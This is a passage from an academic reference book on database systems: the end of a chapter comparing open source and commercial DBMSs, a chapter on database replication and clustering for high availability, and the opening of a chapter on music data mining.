and mailing lists. MySQL AB provides support for MySQL, and several companies and PostgreSQL Inc. provide support for PostgreSQL. These offers include support levels that rival commercial DBMSs, many providing 365x24 support. Training is an important issue in commercial DBMSs. IBM, Microsoft and Oracle set up courses and issue the relevant exams for approval and qualifications to administer the database (Dbazine.com, 2005). MySQL AB provides training in cities around the world and, in some cases, provides in-house education. PostgreSQL training is also available from third parties. Administration is an additional issue, where open source DBMSs shine. The use of smart graphical administration tools facilitates the management of the database. These tools can either be applications that run natively on the operating system or Web-based tools. Many of these tools are modelled closely on tools available to commercial DBMSs with the appropriate modifications. Out of the latter, Oracle is believed to run on the most complex administration, requiring significant knowledge on the part of the administrator of the system’s internal structure. With respect to external library and API support, all systems enjoy the privilege of having implementations of all major programming interfaces such as ODBC, JDBC, C and C++ libraries and others (PostgreSQL.org, 2005b). This allows developers to select their programming language and database of choice when creating applications that utilize a database server.
Performance
In conclusion, the cost of acquiring a license to use database software should not be omitted. PostgreSQL and Firebird can offer their services for free even though third party commercial modules may change that. MySQL AB dual licenses their DBMS, while the commercial version of MySQL consists of a small fraction of the costs of even the cheapest commercial DBMS. In the commercial camp, DB2 is the most expensive product (Microsoft.com, 2006), when considering base product, maintainability, and additional enterprise level capabilities reaching in July 2006 a total of $329.00. Oracle is also an expensive product as the enterprise edition version bundled with the enterprise level add-ons sells at approximately $266.00. On the other hand Microsoft offers SQL Server accompanied by their respective business intelligence support at a significantly lower price of $25.00. The results from the comparison at tier 5 are summarized in Table 6.
Assumptions Open source DBMSs have evolved to a considerable degree. The gap between these systems and their proprietary rivals has been narrowed but not totally closed. Currently, the leading open source database engines, considering all possible aspects, are still inferior in terms of performance and features to DB2, Oracle and SQL Server. However, their capabilities may certainly offer
23
A Generalized Comparison of Open Source and Commercial Database Management Systems
Table 6. Tier 5 comparison results RDBMS
Training
Administration
Technical Support
Interfaces
Cost
DB2
HIGH
HIGH
VERY HIGH
VERY HIGH
VERY HIGH
Firebird
MEDIUM
VERY HIGH
LOW
VERY HIGH
-
MySQL
HIGH
HIGH
HIGH
VERY HIGH
-/MEDIUM
Oracle
VERY HIGH
HIGH
VERY HIGH
VERY HIGH
VERY HIGH
PostgreSQL
LOW
HIGH
MEDIUM
VERY HIGH
-
SQL Server
HIGH
HIGH
VERY HIGH
VERY HIGH
HIGH
enough to meet the needs of most small and medium sized companies or even large ones, serving supplementary purposes. A living example of this practice is encountered at NASA that uses MySQL to store information about public contracts, and the American Chemical Society that uses PostgreSQL to store specific documents. It is important to note that most users and companies do not require some of the state of the art advanced features, and scalability options found exclusively on commercial DBMSs. Moreover, as with all open source software, Firebird, MySQL, PostgreSQL and other open source DBMSs are free, easy to try out and have lots of freely available online documentation to help each individual to learn how to use them. While these DBMSs may not be optimal for every possible project, they could prove to be acceptable and satisfying to others.
FUTURE TRENDS It is strongly believed that the open source movement will transform the software business in the next five to ten years, according to top industry executives speaking at the AO 2005 Innovation Summit at Stanford University (Wheeler, 2005). A group of analysts claims that the reasons for such an adoption are not entirely of an ideological nature. Stability, performance and security will be other drivers of open source software, according to BusinessWeek.com 2006. Sun Microsystems
24
President Jonathan Schwartz claimed that the software industry must adopt open standards for it to thrive. “Open standards mean more than open source” (CNET NEWS.COM, 2005). This stream will inevitably influence the scientific sector of database software. As DBMSs built from open source code are gaining in capabilities with every new release and enjoying rapid adoption by various users of new technology, it is almost certain that open source DBMSs will eventually level with commercial ones with respect to all possible aspects. As a result, many companies will adopt these systems instead of commercial ones allowing them to save money and reduce their operational costs while forming at the same time a current that will definitely threaten commercial DBMS vendors. When Oracle Corporation announced its acquisition of Innobase (The Inquirer.net, 2005) it gave notice that MySQL’s license to use the InnoDB storage mechanism would be renegotiated when it comes up for renewal next year. Some in the industry see this purchase as a way for Oracle to align MySQL AB towards their politic and influence their future direction. Furthermore, Sun Microsystems announced that they will add support for the PostgreSQL Database and that it would add it to the Solaris operating system. What is sure is that the open source boat that carries along the database system software as one of its open source passengers is sailing fast, towards its growing recognition and adop-
A Generalized Comparison of Open Source and Commercial Database Management Systems
tion. Commercial firms that once neglected the presence of open source projects are now on the move to approach and somehow contain open source initiatives, either by embracing them or trying to tame them. Many field experts believe (BusinessWeek.com, 2006) that open source databases software has a bright future, not as standalone products but as fundamental blocks in commercial database software, that also includes proprietary elements.
CONCLUSION Many could question the interest surrounding open source DBMSs. And this is due to the fact that, in many ways, the open source label is attached to initiatives such as Linux and Apache. Unfortunately for many commercial firms and fortunately for the rest, pen source is much more than these two representatives. After many years of hard work and little attention, these open source DBMSs are starting to have a noticeable impact on the largest DBMS companies. Long criticized for not having advanced enterprise features, reliability and customer support, open source DBMS kept on becoming more and more competitive with the release of each new version. Taking into consideration, this criticism, these products strived to improve and include the so-far lacking features, while maintaining their strong aspects. As a result, it is only a matter of time before open source DBMSs could stand against their proprietary software counterparts as equals and even perform better in some sectors. This has alarmed many commercial organizations that, in one way or another, laid their hands on these open source products. Even though the results cannot be absolutely foreseen, its can be asserted without any doubt that open source DBMSs will scale up from the status of attracting intellectual curiosity that led them in 2003 to become widespread. Either as standalone products or as subsystems of commercial DBMSs,
open source DBMSs will continue to support the IT community for the years to come, as they have always done.
REFERENCES Burlseon Consulting. (2003). Oracle vs. SQL Server. Retrieved from http://www.dba-oracle.com/ oracle_tips_oracle_v_sql_server.htm#jambu BusinessWeek.com. (2006). Taking on the database giants. Retrieved from http://www. businessweek.com/technology/content/feb2006/ tc20060206_918648.htm CNET NEWS.COM. (2005). Tech VIPs say future belongs to open source. Retrieved from http:// news.com.com/Tech+VIPs+say+future+belong s+to+open+source/2100-7344_3-5798964.html Dbazine.com. (2005). DBA certifications compared: Oracle vs. DB2 vs. SQL Server. Retrieved from http://www.dbazine.com/ofinterest/oi-articles/fosdick2 Devx.com. (2005). PostgreSQL vs. MySQL vs. commercial databases: It’s all about what you need. Retrieved from http://www.devx.com/dbzone/Article/20743/1954?pf=true Europa.eu.int. (2005). A big step forward. Retrieved from http://europa.eu.int/idabc/en/document/5220/469 Eweek.com. (2002). Server databases clash. Retrieved from http://www.eweek.com/article2/0,4149,293,00.asp Fermi National Accelerator Laboratory. (2005). Comparison of Oracle, MySQL and PostgreSQL DBMS. Retrieved from http://www-css.fnal.gov/ dsg/external/freeware/mysql-vs-pgsql.html Firebirdsql.org. (2006a). Firebird—Relational database for the new millennium. Retrieved from http://www.firebirdsql.org/
25
A Generalized Comparison of Open Source and Commercial Database Management Systems
Firebirdsql.org. (2006b). Firebird user documentation. Retrieved from http://www.firebirdsql. org/manual/index.html
Spenik M., & Sledge O. (2002), Microsoft SQL Server 2000 DBA Survival Guide (2nd ed.). Sams Press.
FreeDownloadsCenter. (2006). Free InterBase downloads. Retrieved from http://www.freedownloadscenter.com/Search/interbase.html
The Inquirer.net. (2005). Open source databases rounded up. Retrieved from http://www. theinquirer.net/?article=28201
IBM.com. (2006). IBM software—DB2 product family. Retrieved from http://www-306.ibm. com/software/data/db2/
Transaction Processing Performance Council. (2006). Retrieved from http://www.tpc.org/
Informationweek.com. (2004). Popularity growing for open source databases. Retrieved from http://www.informationweek.com/story/showArticle.jhtml?articleID=18312009 Johnson J. (1997). Database: Models, languages, design. Oxford, UK: Oxford University Press. Loney K., & Bryla B. (2005). Oracle Database 10g DBA Handbook. Oracle Press. Microsoft.com. (2006). Microsoft SQL server home. Retrieved from http://www.microsoft. com/sql/default.mspx MySQL.com. (2005). MySQL manual. Retrieved from http://dev.mysql.com/doc/mysql/en/index. html Oracle.com. (2006). Oracle database security. Retrieved from http://www.oracle.com/technology/deploy/security/db_security/index.html PostgreSQL.com. (2005a). PostgreSQL manual. Retrieved from http://www.postgresql.org/ docs/8.0/interactive/index.html PostgreSQL.org. (2005b). Open source database software comparison. Retrieved from http://jdbc. postgresql.org/ Promoteware.com. (2004). SQL server comparison chart (SQL vs MySQL vs Oracle). Retrieved from http://www.promoteware.com/Module/Article/ArticleView.aspx?id=23 Silberschatz A., Korth H. F., & Sundarsham S. (2002). Database System Concepts (4th ed.). McGraw Hill. 26
Wheeler, D. (2005). How to evaluate open source software/free software (OSS/FS) programs. Retrieved from http://www.dwheeler.com/oss_ fs_eval.html Wikipedia.org. (2006a). Open source software. Retrieved from http://en.wikipedia.org/wiki/ Open_source_software Wikipedia.org. (2006b). Comparison of relational database management systems. Retrieved from http://en.wikipedia.org/wiki/Comparison_of_relational_database_management_systems Winslow, M. (2004). The practical manager’s guide to open source. Lulu Press.
KEY TERMS Atomicity, Consistency, Isolation, and Durability (ACID): Considered to be the key transaction processing features/properties of a database system. Without them, the integrity of the database cannot be guaranteed. Database: An organized collection of data (records) that is stored in a computer in a systematic way, so that computer software might consult it to answer questions. The database model in most common use today is the relational model. Grid Computing: A computing model that provides the ability to perform higher throughput computing by taking advantage of many networked computers to model a virtual computer architecture that is able to distribute process
A Generalized Comparison of Open Source and Commercial Database Management Systems
execution across a parallel infrastructure. Grids use the resources of many separate computers connected by a network to solve large-scale computation problems. GNU General Public License (GPL): It is the most popular free software license originally written by Richard Stallman for the GNU project. The GPL grants the recipients of computer software the following rights: • •
• •
Freedom to run the program, for any purpose Freedom to study how the program works, and modify it. (Access to the source code is a precondition for this) Freedom to redistribute copies Freedom to improve the program, and release the improvements to the public (access to the source code is a precondition for this)
Graphical User Interface (GUI): It refers to computer software that offers direct manipulation of graphical images and widgets in addition to text. Object-Relational Database Management System (ORDBMS): It is a database management system that allows developers to integrate the database with their own custom data types and methods. Online Analytical Processing (OLAP): It is an approach to quickly provide the answer to complex analytical queries. It is part of the broader business intelligence category that also includes
data mining. The typical applications of OLAP are in business reporting for sales, marketing, management reporting business performance management (BPM), budgeting and forecasting, financial reporting, and similar areas. Open Source Software (OSS): Computer software available with its source code under an open source license to study, change and improve its design. The open source philosophy further defines a boundary on the usage, modification, and redistribution of open source software. Software licenses grant rights to users, which would otherwise be prohibited by copyright. These include rights on usage, modification, and redistribution. Several open source software licenses have qualified within the boundary of the Open Source Definition. Relational Database Management System (RDBMS): It is a database management system that is based on the relational model as introduced by Edgar F. Codd. The model represents all information in the form of multiple related tables, every one consisting of rows and columns. Structured Query Language (SQL): It is the most popular computer language used to create, modify and retrieve data from relational database management systems. The language has evolved beyond its original purpose to support object-relational database management systems. It is an ANSI/ISO standard.
This work was previously published in Handbook of Research on Open Source Software: Technological, Economic, and Social Perspectives, edited by K. St. Amant and B. Still, pp. 294-308, copyright 2007 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
27
28
Chapter 1.3
Highly Available Database Management Systems Wenbing Zhao Cleveland State University, USA
INTRODUCTION In the Internet age, real-time Web-based services are becoming more pervasive every day. They span virtually all business and government sectors, and typically have a large number of users. Many such services require continuous operation, 24 hours a day, seven days a week. Any extended disruption in services, including both planned and unplanned downtime, can result in significant financial loss and negative social effects. Consequently, the systems providing these services must be made highly available. A Web-based service is typically powered by a multi-tier system, consisting of Web servers, application servers, and database management systems, running in a server farm environment. The Web servers handle direct Web traffic and pass requests that need further processing to the application servers. The application servers process the requests according to the predefined business logic. The database management systems store and manage all mission-critical data and application
states so that the Web servers and application servers can be programmed as stateless servers. (Some application servers may cache information, or keep session state. However, the loss of such state may reduce performance temporarily or may be slightly annoying to the affected user, but not critical.) This design is driven by the demand for high scalability (to support a large number of users) and high availability (to provide services all the time). If the number of users has increased, more Web servers and application servers can be added dynamically. If a Web server or an application server fails, the next request can be routed to another server for processing. Inevitably, this design increases the burden and importance of the database management systems. However, this is not done without good reason. Web applications often need to access and generate a huge amount of data on requests from a large number of users. A database management system can store and manage the data in a wellorganized and structured way (often using the relational model). It also provides highly efficient
concurrency control on accesses to shared data. While it is relatively straightforward to ensure high availability for Web servers and application servers by simply running multiple copies in the stateless design, it is not so for a database management system, which in general has abundant state. The subject of highly available database systems has been studied for more than two decades, and there exist many alternative solutions (Agrawal, El Abbadi, & Steinke, 1997; Kemme, & Alonso, 2000; Patino-Martinez, Jimenez-Peris, Kemme, & Alonso, 2005). In this article, we provide an overview of two of the most popular database high availability strategies, namely database replication and database clustering. The emphasis is given to those that have been adopted and implemented by major database management systems (Davies & Fisk, 2006; Ault & Tumma, 2003).
BACKGROUND A database management system consists of a set of data and a number of processes that manage the data. These processes are often collectively referred to as database servers. The core programming model used in database management systems is called transaction processing. In this programming model, a group of read and write operations on a data set are demarcated within a transaction. A transaction has the following ACID properties (Gray & Reuter, 1993): •
•
•
Atomicity: All operations on the data set agree on the same outcome. Either all the operations succeed (the transaction commits) or none of them do (the transaction aborts). Consistency: If the database is consistent at the beginning of a transaction, then the database remains consistent after the transaction commits. Isolation: A transaction does not read or overwrite a data item that has been accessed by another concurrent transaction.
•
Durability: The update to the data set becomes permanent once the transaction is committed.
To support multiple concurrent users, a database management system uses sophisticated concurrency control algorithms to ensure the isolation of different transactions even if they access some shared data concurrently (Bernstein, Hadzilacos, & Goodman, 1987). The strongest isolation can be achieved by imposing a serializable order on all conflicting read and write operations of a set of transactions so that the transactions appear to be executed sequentially. Two operations are said to be conflicting if both operations access the same data item, at least one of them is a write operation, and they belong to different transactions. Another popular isolation model is snapshot isolation. Under the snapshot isolation model, a transaction performs its operations against a snapshot of the database taken at the start of the transaction. The transaction will be committed if the write operations do not conflict with any other transaction that has committed since the snapshot was taken. The snapshot isolation model can provide better concurrent execution than the serializable isolation model. A major challenge in database replication, the basic method to achieve high availability, is that it is not acceptable to reduce the concurrency levels. This is in sharp contrast to the replication requirement in some other field, which often assumes that the replicas are single-threaded and deterministic (Castro & Liskov, 2002).
DATABASE HIGH AVAILABILITY TECHNIQUES To achieve high availability, a database system must try to maximize the time to operate correctly without a fault and minimize the time to recover from a fault. The transaction processing model used in database management systems has some
29
Highly Available Database Management Systems
degree of fault tolerance in that a fault normally cannot corrupt the integrity of the database. If a fault occurs, all ongoing transactions will be aborted on recovery. However, the recovery time would be too long to satisfy the high availability requirement. To effectively minimize the recovery time, redundant hardware and software must be used. Many types of hardware fault can in fact be masked. For example, power failures can be masked by using redundant power supplies, and local communication system failures can be masked by using redundant network interface cards, cables, and switches. Storage medium failures can be masked by using RAID (redundant array of inexpensive disks) or similar techniques. To tolerate the failures of database servers, several server instances (instead of one) must be used so that if one fails, another instance can take over. The most common techniques are database replication and database clustering. These two techniques are not completely distinct from each other, however. Database replication is typically used to protect against total site failures. In database replication, two or more redundant database systems operate in different sites — ideally in different geographical regions — and communicate with each other using messages over a (possibly redundant) communication channel. Database clustering is used to provide high availability for a local site. There are two competing approaches in database clustering. One uses a shared-everything (also referred to as shared-disk) design, such as the Oracle Real Application Cluster (RAC) (Ault & Tumma, 2003). The other follows a shared-nothing strategy, such as the MySQL Cluster (Davies & Fisk, 2006) and most DB2 shared database systems. To achieve maximum fault tolerance and hence high availability, one can combine database replication with database clustering.
Database Replication Database replication means that there are two or more instances of database management systems,
30
including server processes, data files, and logs, running on different sites. Usually one of the replicas is designated as the primary, and the rest of the replicas are backups. The primary accepts users’ requests and propagates the changes to the database to the backups. In some systems, the backups are allowed to accept read-only queries. It is also possible to configure all replicas to handle users’ requests directly. But doing so increases the complexity of concurrency control and the risk of more frequent transaction aborts. Depending on how and when changes to the database are propagated across the replicas, there are two different database replication styles, often referred to as eager replication and lazy replication (Gray & Reuter, 1993). In eager replication, the changes (i.e., the redo log) are transferred to the backups synchronously before the commit of a transaction. In lazy replication, the changes are transferred asynchronously from the primary to the backups after the transactions have been committed. Because of the high communication cost, eager replication is rarely used to protect site failures where the primary and the backups are usually far apart. (Eager replication has been used in some shared-nothing database clusters.)
Eager Replication To ensure strong replica consistency, the primary must propagate the changes to the backups within the boundary of a transaction. For this, a distributed commit protocol is needed to coordinate the commitment of each transaction across all replicas. The benefit for doing eager replication is that if the primary fails, a backup can take over instantly as soon as it detects the primary failure. The most popular distributed commit protocol is the two-phase commit (2PC) protocol (Gray & Reuter, 1993). The 2PC protocol guarantees the atomicity of a transaction across all replicas in two phases. In the first phase, the primary (which serves as the coordinator for the protocol) sends
Highly Available Database Management Systems
a prepare request to all backups. If a backup can successfully log the changes, so that it can perform the update even in the presence of a fault, it responds with a “Yes” vote. If the primary collects “Yes” votes from all backups, it decides to commit the transaction. If it receives even a single “No” vote or it times out a backup, the primary decides to abort the transaction. In the second phase, the primary notifies the backups of its decision. Each backup then either commits or aborts the transaction locally according to the primary’s decision and sends an acknowledgment to the primary. As can be seen, the 2PC protocol incurs significant communication overhead. There are also other problems such as the potential blocking if the primary fails after all backups have voted to commit a transaction (Skeen, 1981). Consequently, there has been extensive research on alternative eager replication techniques, for example, the epidemic protocols (Agrawal et al., 1997; Stanoi, Agrawal, & El Abbadi, 1998), and multicast-based approaches (Kemme & Alonso, 2000; PatinoMartinez et al., 2005). However, they have not been adopted by any major commercial product due to their high overhead or complexities.
ent replicas might make incompatible decisions, in which case manual reconciliation is required.
Database Clustering In recent years, database clustering has evolved to be the most promising technique to achieve high availability as well as high scalability (Ault & Tumma, 2003; Davies & Fisk, 2006). Database clustering, as the name suggests, uses a group of computers interconnected by a high-speed network. In the cluster, multiple database server instances are deployed. If one instance fails, another instance takes over very quickly so high availability is ensured. Database clustering not only brings high availability, but the scaling-out capability as well. Scaling-out means that the capacity of a database management system can be dynamically increased by adding more inexpensive nodes while keeping the old equipment. There are two alternative approaches in database clustering. One approach pioneered in Oracle RAC adopts a shared-everything architecture. A number of other products choose to use the shared-nothing architecture. Both approaches have their challenges and advantages.
Lazy Replication Shared-Everything Cluster Most commercial database systems support lazy replication. In lazy replication, the primary commits a transaction immediately. The redo log, which reflects the changes made for the recently committed transactions, is transferred to backups asynchronously. Usually, the backup replicas lag behind the primary by a few transactions. This means that if the primary fails, the last several committed transactions might get lost. Besides the primary/backup replication approach, some database management systems allow a multi-primary configuration where all replicas are allowed to accept update transactions. If this configuration is used with lazy replication, differ-
In a shared-everything database cluster, all server instances share the same storage device, such as a storage area network. The cluster nodes typically connect to the shared storage device via a fiber channel switch or shared SCSI for fast disk I/O. The shared storage device must also have builtin redundancy such as mirrored disks to mask disk failures. To minimize disk I/O, all server instances share a common virtual cache space. The virtual cache space consists of local cache buffers owned by individual server instances. A number of background processes are used to maintain the consistency of the data blocks in the
31
Highly Available Database Management Systems
cache space. These processes are also responsible to synchronize the access to the cached data blocks because only one server instance is allowed to modify a data block at a time. Each server instance has its own transaction logs stored in the shared disk. If a server instance fails, another server instance takes over by performing a roll-forward recovery using the redo log of the failed server instance. This is to ensure that the changes made by committed transactions are recorded in the database and do not get lost. The recovery instance also rolls back the transactions that were active at the time of the failure and releases the locks on the resources used by those transactions. The shared-everything design makes it unnecessary to repartition the data, and therefore eases the tasks of cluster maintenance and management. However, this benefit does not come for free. The most prominent concern is the cost of inter-node synchronization. Unless high-speed interconnect is used and the workload is properly distributed among the server instances, the inter-node synchronization might limit the scalability of the cluster. Also, the requirement for a high-speed shared disk system also imposes a higher financial cost than using conventional disks.
Shared-Nothing Cluster In a shared-nothing database cluster, each node runs one or more server instances and has its own memory space and stable storage. Essential to the shared-nothing approach, the data must be partitioned either manually or automatically by the database system across different nodes. Each partition must be replicated in two or more nodes to keep the desired redundancy level. Concurrency control and caching are carried out in each local node, and therefore they are more efficient than those in shared-everything clusters. However, to ensure the consistency of replicated data and fast recovery, the two-phase commit protocol is often used to ensure atomic commitment of the
32
transactions in the cluster. Comparing with the shared-everything approach, the cost of inter-node synchronization is essentially replaced by that of distributed commit. The shared-nothing approach faces the additional challenge of split-brain syndrome prevention (Birman, 2005). The split-brain syndrome may happen if the network partitions, and if each partition makes incompatible decisions on the outcome of transactions or their relative orders. To prevent this problem, typically only the main partition is allowed to survive. The minor partition must stop accepting new transaction and abort active transactions. Usually, the main partition is the one that consists of the majority of the replicas or the one that contains a special node designated as the arbitration node (Davies & Fisk, 2006).
FUTURE TRENDS Existing database systems are designed to tolerate process crash fault and hardware fault. However, considering the increased pace of security breaches, future database management systems must be designed to be intrusion tolerant — that is, they should provide high availability against a variety of security threats, such as the unauthorized deletion and alteration of database records, the disruption of distributed commit (may cause replica inconsistency), and the exposure of confidential information. To make a database system intrusion tolerant, many fundamental protocols such as the 2PC protocol must be enhanced. There may also be a need to design special tamper-proof storage devices to protect data integrity (Strunk, Goodson, Scheinholtz, Soules, & Ganger, 2000). Even though there has been intensive research in this area (Castro & Liskov, 2002; Malkhi & Reiter, 1997; Mohan, Strong, & Finkelstein, 1983; Deswarte, Blain, & Fabre, 1991), the results have rarely been incorporated into commercial products
Highly Available Database Management Systems
yet. The primary barrier is the high commutation and communication cost, the complexity, and the high degree of replication required to tolerate malicious faults.
CONCLUSION Database systems are the cornerstones of today’s information systems. The availability of database systems largely determines the quality of service provided by the information systems. In this article, we provided a brief overview of the state-of-the-art database replication and clustering techniques. For many, a low-cost sharednothing database cluster that uses conventional hardware might be a good starting point towards high availability. We envisage that future generation of database management systems will be intrusion tolerant — that is, they are capable of continuous operation against not only hardware and process crash fault, but a variety of security threats as well.
REFERENCES Agrawal, D., El Abbadi, A., & Steinke, R.C. (1997). Epidemic algorithms in replicated databases. Proceedings of the ACM Symposium on Principles of Database Systems (pp. 161-172), Tucson, AZ. Ault, M., & Tumma, M. (2003). Oracle9i RAC: Oracle real application clusters configuration and internals. Kittrell, NC: Rampant TechPress. Bernstein, P.A., Hadzilacos, V., & Goodman, N. (1987). Concurrency control and recovery in database systems. Reading, MA: Addison-Wesley. Birman, K. (2005). Reliable distributed systems: Technologies, Web services, and applications. Berlin: Springer-Verlag.
Castro, M., & Liskov, B. (2002). Practical Byzantine fault tolerance and proactive recovery. ACM Transactions on Computer Systems, 20(4), 398-461. Davies, A., & Fisk, H. (2006). MySQL clustering. MySQL Press. Deswarte, Y., Blain, L., & Fabre, J.C. (1991). Intrusion tolerance in distributed computing systems. Proceedings of the IEEE Symposium on Research in Security and Privacy (pp. 110-121). Oakland, CA: IEEE Computer Society Press. Gray, J., & Reuter, A. (1993). Transaction processing: Concepts and techniques. San Mateo, CA: Morgan Kaufmann. Kemme, B., & Alonso, G. (2000). A new approach to developing and implementing eager database replication protocols. ACM Transactions on Database Systems, 25(3), 333-379. Malkhi, D., & Reiter, M. (1997). Byzantine quorum systems. Proceedings of the ACM Symposium on Theory of Computing (pp. 569-578), El Paso, TX. Mohan, C., Strong, R., & Finkelstein, S. (1983). Method for distributed transaction commit and recovery using Byzantine agreement within clusters of processors. Proceedings of the ACM Symposium on Principles of Distributed Computing (pp. 89-103), Montreal, Quebec. Patino-Martinez, M., Jimenez-Peris, R., Kemme, B., & Alonso, G. (2005). Middle-R: Consistent database replication at the middleware level. ACM Transactions on Computer Systems, 375-423. Skeen, D. (1981). Nonblocking commit protocols. Proceedings of the ACM International Conference on Management of Data (pp. 133-142), Ann Arbor, MI. Stanoi, I., Agrawal, D., & El Abbadi, A. (1998). Using broadcast primitives in replicated databases. Proceedings of the IEEE International Conference
33
Highly Available Database Management Systems
on Distributed Computing Systems (pp. 148-155), Amsterdam, The Netherlands. Strunk, D., Goodson, G., Scheinholtz, M., Soules, C., & Ganger, G. (2000). Self-securing storage: Protecting data in compromised systems. Proceedings of the USENIX Association Symposium on Operating Systems Design and Implementation (pp. 165-189), San Diego, CA.
KEY TERMS Database Cluster (Shared-Everything, Shared-Nothing): A database management system runs on a group of computers interconnected by a high-speed network. In the cluster, multiple database server instances are deployed. If one instance fails, another instance takes over very quickly to ensure high availability. In the shared-everything design, all nodes can access a shared stable storage device. In the shared-nothing design, each node has its own cache buffer and stable storage. Database Recovery (Roll-Backward, RollForward): Recovery is needed when a database instance that has failed is restarted or a surviving database instance takes over a failed one. In roll-backward recovery, the active transactions at the time of failure are aborted and the resourced allocated for those transactions are released. In roll-forward recovery, the updates recorded in the redo log are transferred to the database so that they are not lost. Database Replication (Eager, Lazy): Multiple instances of a database management system
are deployed in different computers (often located in different sites). Their state is synchronized closely to ensure replica consistency. In eager replication, the updates are propagated and applied to all replicas within the transaction boundary. In lazy replication, the changes are propagated from one replica to others asynchronously. High Availability (HA): The capability of a system to operate with long uptime and to recover quickly if a failure occurs. Typically, a highly available system implies that its measured uptime is five nines (99.999%) or better, which corresponds to 5.25 minutes of planned and unplanned downtime per year. Split-Brain Syndrome: This problem may happen if the network partitions in a database cluster, and if each partition makes incompatible decisions on the outcome of transactions or their orders. To prevent this problem, typically only the main partition is allowed to survive. Transaction: A group of read/write operations on the same data set that succeeds or fails atomically. More accurately, a transaction that has atomicity, consistency, isolation, and durability properties. Two-Phase Commit Protocol (2PC): This protocol ensures atomic commitment of a transaction that spans multiple nodes in two phases. During the first phase, the coordinator (often the primary replica) queries the prepare status of a transaction. If all participants agree to commit, the coordinator decides to commit. Otherwise, the transaction is aborted. The second phase is needed to propagate the decision to all participants.
This work was previously published in Encyclopedia of Information Science and Technology, Second Edition, edited by M. Khosrow-Pour, pp. 1733-1737, copyright 2009 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
34
35
Chapter 1.4
Mining in Music Databases Ioannis Karydis Aristotle University of Thessaloniki, Greece Alexandros Nanopoulos Aristotle University of Thessaloniki, Greece Yannis Manolopoulos Aristotle University of Thessaloniki, Greece
ABSTRACT
INTRODUCTION
This chapter provides a broad survey of music data mining, including clustering, classification and pattern discovery in music. The data studied is mainly symbolic encodings of musical scores, although digital audio (acoustic data) is also addressed. Throughout the chapter, practical applications of music data mining are presented. Music data mining addresses the discovery of knowledge from music corpora. This chapter encapsulates the theory and methods required in order to discover knowledge in the form of patterns for music analysis and retrieval, or statistical models for music classification and generation. Music data, with their temporal, highly structured and polyphonic character, introduce new challenges for data mining. Additionally, due to their complex structure and their subjectivity to inaccuracies caused by perceptual effects, music data present challenges in knowledge representation as well.
Musical analysis is recognised as a significant part of the study of musical cognition. The analysis of music data has the objective of determining the fundamental point of contact between mind and musical sound (musical perception) (Bent, 1980). Musical analysis is the activity musicologists are engaged in and is conducted on a single piece of music, on a portion or element of a piece or on a collection of pieces. This research area embays the field of music data mining (henceforth called music mining), which deals with the theory and methods of discovering knowledge from music pieces and can be considered as a collection of (semi-) automated methods for analysing music data. Following music-mining methodologies, music analysts extract1 recurring structures and their organisation in music pieces, trying to understand the style and techniques of compos-
ers (Rolland & Ganascia, 2002). However, the size and peculiarities of music data may become prohibitive factors for the aforementioned task. This represents an analogy to the difficulties faced by data analysts when trying to discover patterns from databases, i.e., the huge database sizes and the large number of dimensions, which are the very reasons that paved the way for the development of database mining, a.k.a. data mining or knowledge discovery from databases (KDD). Despite the previously mentioned analogy between music mining and database mining, the nature of music data requires the development of radically different approaches. In the sequel to this section we will summarise the particular challenges that music mining presents. Another key issue in which music mining differs from other related areas (for instance, database mining or Web mining) is the applications it finds. Discovered patterns from relational or other types of databases are usually actionable, in the sense that they may suggest an action to be taken. For instance, association rules from market-basket data may indicate an improvement in selling policy, or user-access patterns extracted from a Web-log file may help in redesigning the Web site. Such kinds of “actionability” are related to a form of “profit” and stem from the involved industry field (e.g., retail, insurance, telecommunications, etc.). The question, therefore, emerges: “Which is the usability of patterns extracted from music data?” In order to answer this question, one has to consider the current status of the involved industry, that is, the “music industry.” The influence that music has always had on people is reflected in music commodities and services that are offered today.2 The annual gains of the music industry are estimated to reach up to several billion dollars (Leman, 2002). Within this context, the music content is a source of economical activity. This is intensified by the ease that the Web has brought in the delivery of music content; a prominent example of this case is Napster. What is, thus, becoming of significant
36
interest is the need for content-based searching within music collections, e.g., by using a Karaoke machine to retrieve similar songs over a Web site or by humming over a mobile phone to download a song. The corresponding research field that has been developed is called content-based music information retrieval (CBMIR) (Lippincott, 2002; Pfeiffer, Fischer, & Effelsberg, 1996). It is natural, therefore, to anticipate that music mining finds applications in designing effective CBMIR systems. In fact, CBMIR has considerably biased the directions that research in music mining is now following by stating the objectives to be achieved. The contribution of music mining in CBMIR is better understood by considering that the extracted patterns describe and represent music content at different abstraction levels (e.g., by producing concept taxonomies). The description of music content with such representations helps users in posing queries using content descriptors (rational or emotional), which drastically improve the effectiveness of retrieval in CBMIR systems (Leman, 2002), compared to simplistic search using plain text descriptors like song titles or the composers’ names. Additionally, searching times are decreased, since the extracted patterns constitute a more compact representation of music content. The advantages from both the aforementioned directions are evident in a broad range of commercial domains, from music libraries to consumer oriented e-commerce of music (Rolland & Ganascia, 2002).
The Challenges of Music Data Mining Byrd and Crawford (2002) list several reasons for which it is difficult to manage music data. Since most of these issues are inherent in music data due to their nature, they also affect the process of music data mining. In particular, among the most significant problems and difficulties that arise in data mining, are:
Mining in Music Databases
(a) (b) (c)
(d) (e) (f)
the identification of meaningful musical units; the simultaneity of independent voices (denoted as polyphony); the fact that patterns are repeated approximately and not exactly (due to variations and ornamentation posed by composers); discrepancies (denoted as “errors”) caused by differences between performances; the large size of music data, which burdens scalability; and the non-existence of trivial ways to incorporate background knowledge.
The aforesaid issues, along with references to solutions provided for them, are detailed in the following. The most basic difficulty stems from the fact that it has not been clear so far how to automatically segment music data into meaningful units, like music phrases or motives. In order to be able to extract patterns, it is reasonable to desire the representation of music in such units, in the way that text mining considers words as units of text data that are used for pattern searching3 . Although the difficulty is larger for acoustic representations of music, it is not easy to detect basic units in symbolic representation as well (for representation types, see the following section on music databases). The problem is further intensified by considering that there exists an amount of overlap between music units; one such case is due to polyphony. A number of research works (Chai & Vercoe, 2003; Temperley, 2001; Meredith, 2003) have diversely addressed this issue. Polyphony is an additional source of difficulties. For simplicity, initial attempts in music mining focused on symbolic representation of monophonic music. Polyphony, however, is present in almost all real works of music. The difficulty arises from the fact that it is required to separate simultaneous independent voices in order to distinguish them, in the same way that one separately recognises the lines of each char-
